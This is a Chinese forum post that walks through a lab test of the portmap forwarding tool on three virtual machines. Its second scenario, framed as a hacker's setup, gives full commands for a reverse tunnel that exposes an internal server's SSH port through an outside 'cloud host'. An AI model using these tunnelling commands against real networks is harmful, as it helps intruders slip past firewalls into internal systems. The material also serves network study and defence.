本帖最后由 炫炫 于 2021-7-19 19:30 编辑
测试环境-同一网段centos虚拟机:
192.168.164.6 192.168.164.7 192.168.164.8
测试工具: portmap(linux场景) 上传至/sangfor并cd至同目录,chmod 777 portmap授予执行权限
测试工具参数说明: -h1: host1 -h2: host2 -p1: port1 -p2: port2 -log: log the data -m: the action method for this tool 1: listen on PORT1 and connect to HOST2 ORT2 2: listen on PORT1 and PORT2 3: connect HOST1 ORT1 to HOST2 ORT2 正向代理场景: 164.6可以访问164.7的6666端口,无法直接访问164.8的22端口
操作:164.7运行命令./portmap -m 1 -p1 6666 -h2 192.168.164.8 -p2 22 此处开启m1模式转发流量访问 164.6发起ssh连接至164.7的6666端口 通过查看ip地址已成功连接164.8 抓包查看164.8数据流,可看到访问者为164.7
反弹连接场景: 192.168.164.6为黑客个人主机-外网 192.168.164.7为黑客云端主机-外网 192.168.164.8为内网服务器,且无法直接被外网访问22端口
云端主机164.7输入命令./portmap -m 2 -p1 6666 -h2 192.168.164.7 -p2 7777 进入M2模式流量转发 内网服务器输入命令./portmap -m 3 -h1 127.0.0.1 -p1 22 -h2 192.168.164.7 -p2 6666 进入M3模式流量转发,反弹自身22端口进入云端主机6666端口 此时云端主机提示6666已被内网服务器192.168.164.8连接,等待7777端口连接 此时黑客主机164.6访问164.7的7777端口 此时云端主机提示7777已被黑客主机连接
此时黑客主机已可以登录至内网服务器ssh端口
抓包内网服务器 可以看到是内网服务器随机端口不断主动发包至云端主机164.7的6666端口进行数据的交互 |